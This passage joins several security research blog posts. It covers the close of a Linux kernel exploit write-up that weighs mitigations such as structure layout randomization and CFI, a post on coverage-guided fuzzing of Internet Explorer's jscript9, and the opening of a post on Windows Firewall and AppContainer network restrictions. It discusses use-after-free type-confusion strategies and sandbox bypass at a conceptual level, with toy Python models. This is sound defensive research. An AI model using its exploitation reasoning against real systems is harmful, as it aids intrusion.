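            return freelist.pop()      # reuse the most recently freed object
        addr = self.next_addr          # otherwise carve out fresh memory
        self.next_addr += size
        return addr

    def free(self, addr, type_name, size):
        self.freelists.setdefault(self.key_fn(type_name, size), []).append(addr)

def dangling_pointer_aliases_other_type(allocator):
    victim = allocator.alloc("struct_a", 128)
    allocator.free(victim, "struct_a", 128)          # a dangling pointer remains
    replacement = allocator.alloc("struct_b", 128)   # attacker-chosen type
    return replacement == victim

by_size = ToyAllocator(lambda type_name, size: size)
by_type = ToyAllocator(lambda type_name, size: (type_name, size))
print(dangling_pointer_aliases_other_type(by_size))
print(dangling_pointer_aliases_other_type(by_type))
```

With size-keyed caches the freed address immediately comes back as a different type; with type-keyed caches it can only come back as the same type, which is the property that virtually-backed slabs would then preserve across page frees.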

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)
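The "lower or upper half" point can be illustrated by shuffling a made-up struct and checking where a 4-byte counter lands relative to 8-byte boundaries. The field list below is hypothetical and is not the layout of struct pid; the sketch also assumes natural alignment and a little-endian machine, so that the lower offset corresponds to the lower half of a PTE.

```python
import random

# Hypothetical members as (name, size in bytes); not a real kernel struct.
FIELDS = [("count", 4), ("level", 4), ("ptr_a", 8), ("ptr_b", 8), ("ptr_c", 8)]

def layout(fields):
    """Assign offsets in order, aligning each member to its own size."""
    offsets, offset = {}, 0
    for name, size in fields:
        offset = (offset + size - 1) // size * size
        offsets[name] = offset
        offset += size
    return offsets

def pte_half(rng):
    """Shuffle the members and report which half of an 8-byte PTE 'count' overlaps."""
    shuffled = FIELDS[:]
    rng.shuffle(shuffled)
    return "lower" if layout(shuffled)["count"] % 8 == 0 else "upper"

rng = random.Random(7)
counts = {"lower": 0, "upper": 0}
for _ in range(10000):
    counts[pte_half(rng)] += 1
print(counts)
```

Both outcomes occur, so an attacker who needs the counter to overlap one specific half of the PTE has to either learn the layout of the target build or accept a chance of failure.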

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker cannot completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).
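The idea of randomizing only within a cache line can be sketched in a few lines of Python. This is a simplified model and not the algorithm used by the randstruct plugin: it assumes 64-byte cache lines, ignores alignment and padding, and all names are hypothetical.

```python
import random

CACHE_LINE = 64  # assumption: 64-byte cache lines


def group_by_cache_line(members):
    """Split (name, size) members, in declaration order, into cache-line-sized groups.

    Alignment and padding are ignored to keep the model small.
    """
    groups, current, used = [], [], 0
    for name, size in members:
        if current and used + size > CACHE_LINE:
            groups.append(current)
            current, used = [], 0
        current.append((name, size))
        used += size
    if current:
        groups.append(current)
    return groups


def randomize_within_cache_lines(members, seed):
    """Shuffle members inside each group, keeping the order of the groups."""
    rng = random.Random(seed)
    result = []
    for group in group_by_cache_line(members):
        shuffled = list(group)
        rng.shuffle(shuffled)
        result.extend(shuffled)
    return result


if __name__ == "__main__":
    fields = [("field%d" % i, 8) for i in range(16)]
    for name, size in randomize_within_cache_lines(fields, seed=1234):
        print(name, size)
```

Members that were placed together for cache efficiency stay in the same group, at the cost of fewer possible layouts than a full shuffle.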

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main use case.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer) with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (the default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript. 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on Windows builds exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift build on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examples on how to do this, once again from Saleem Abdulrasool.

Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of Windows debugging API functions such as WaitForDebugEvent is that they do not take a debuggee pid or a process handle as an argument. So then, the question is, if you have multiple debuggees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debuggee (or starts a debuggee process), the thread that started/attached it is the debugger. Any subsequent calls for that particular debuggee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.
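The "one dedicated thread per target" pattern can be illustrated with a small Python sketch. This is not TinyInst's implementation (which is C++); it only shows the general technique of funnelling calls from arbitrary threads onto a single owner thread. The class name PinnedExecutor and its methods are hypothetical.

```python
import queue
import threading


class PinnedExecutor:
    """Runs every submitted call on one dedicated thread.

    Callers may live on any thread; the call itself always executes on the
    owner thread, which is what a thread-affine API requires.
    """

    def __init__(self):
        self._tasks = queue.Queue()
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()

    def _run(self):
        while True:
            item = self._tasks.get()
            if item is None:  # shutdown marker
                break
            fn, args, done, box = item
            try:
                box["result"] = fn(*args)
            except BaseException as exc:  # hand the error back to the caller
                box["error"] = exc
            finally:
                done.set()

    def call(self, fn, *args):
        """Execute fn(*args) on the owner thread and wait for the result."""
        done, box = threading.Event(), {}
        self._tasks.put((fn, args, done, box))
        done.wait()
        if "error" in box:
            raise box["error"]
        return box["result"]

    def close(self):
        """Stop the owner thread after pending calls have run."""
        self._tasks.put(None)
        self._thread.join()


if __name__ == "__main__":
    executor = PinnedExecutor()
    # Whichever thread asks, the work runs on the executor's own thread.
    print(executor.call(threading.get_ident) != threading.get_ident())
    executor.close()
```

With one such executor per target process, it no longer matters which background thread a task happens to be scheduled on.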

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/TinyInst hybrid was running in a stable manner.

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.
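As a rough illustration of why repeat nodes make insertion and removal safe, the following Python sketch models a <repeat_statement> node as a plain list of children. It is not Jackalope's code (Jackalope is written in C++), and the three statements stand in for a real grammar; every name here is hypothetical.

```python
import random

# Hypothetical stand-in for the expansions of <statement>.
STATEMENTS = ["var a = 1;", "a++;", "f(a);"]


def generate_statement(rng):
    """Expand one <statement> node."""
    return rng.choice(STATEMENTS)


def generate_repeat(rng, max_children=5):
    """Expand <repeat_statement> into zero or more <statement> children."""
    return [generate_statement(rng) for _ in range(rng.randint(0, max_children))]


def insert_child(children, rng):
    """Insert a freshly generated <statement> at a random position."""
    pos = rng.randint(0, len(children))
    return children[:pos] + [generate_statement(rng)] + children[pos:]


def remove_child(children, rng):
    """Remove one random child; an empty list is already minimal."""
    if not children:
        return list(children)
    pos = rng.randrange(len(children))
    return children[:pos] + children[pos + 1:]


def is_valid(children):
    """A repeat node is valid when every child is a valid <statement>."""
    return all(child in STATEMENTS for child in children)


if __name__ == "__main__":
    rng = random.Random(0)
    sample = generate_repeat(rng)
    sample = insert_child(sample, rng)
    print("\n".join(sample), is_valid(sample))
```

Since "zero or more" accepts any child count, neither operation can produce a sample that falls outside the grammar, and removal doubles as a minimization step.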

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g. when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.
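Two of the operations above, regenerating a node and splicing, can be sketched on a toy grammar in Python. This is an illustration of the general technique under simplifying assumptions, not Jackalope's implementation; the grammar, the Node class and all function names are hypothetical.

```python
import copy
import random
from dataclasses import dataclass, field

# Toy grammar: keys are symbols, everything else is literal text.
# The first rule of each symbol must not recurse, so generation can terminate.
GRAMMAR = {
    "expr": [["num"], ["(", "expr", "+", "expr", ")"]],
    "num": [["1"], ["2"], ["3"]],
}


@dataclass
class Node:
    symbol: str
    children: list = field(default_factory=list)  # Node objects or literal strings

    def text(self):
        """Serialize the tree back into sample text."""
        return "".join(c.text() if isinstance(c, Node) else c for c in self.children)


def generate(symbol, rng, depth=0, max_depth=4):
    """Generate a new tree for `symbol` from scratch."""
    rules = GRAMMAR[symbol]
    rule = rules[0] if depth >= max_depth else rng.choice(rules)
    return Node(symbol, [generate(p, rng, depth + 1, max_depth) if p in GRAMMAR else p
                         for p in rule])


def all_nodes(root):
    """Collect every node of the tree, root included."""
    found = [root]
    for child in root.children:
        if isinstance(child, Node):
            found.extend(all_nodes(child))
    return found


def regenerate_random_node(root, rng):
    """Regenerate one random node while keeping the rest of the tree."""
    target = rng.choice(all_nodes(root))
    target.children = generate(target.symbol, rng).children


def splice(root, other, rng):
    """Replace a random node's content with a same-symbol node from `other`."""
    target = rng.choice(all_nodes(root))
    donors = [n for n in all_nodes(other) if n.symbol == target.symbol]
    if donors:
        target.children = copy.deepcopy(rng.choice(donors).children)


def conforms(node):
    """Check that every node still matches one of its symbol's rules."""
    shape = [c.symbol if isinstance(c, Node) else c for c in node.children]
    return shape in GRAMMAR[node.symbol] and all(
        conforms(c) for c in node.children if isinstance(c, Node))


if __name__ == "__main__":
    rng = random.Random(7)
    sample, donor = generate("expr", rng), generate("expr", rng)
    regenerate_random_node(sample, rng)
    splice(sample, donor, rng)
    print(sample.text(), conforms(sample))
```

Because each mutation swaps a subtree only for another subtree of the same symbol, the result always remains derivable from the grammar.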

The JavaScript grammar was initially constructed by following the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out of the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command line. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 early in the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contains anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines, is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

Understanding Network Access in Windows AppContainers

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

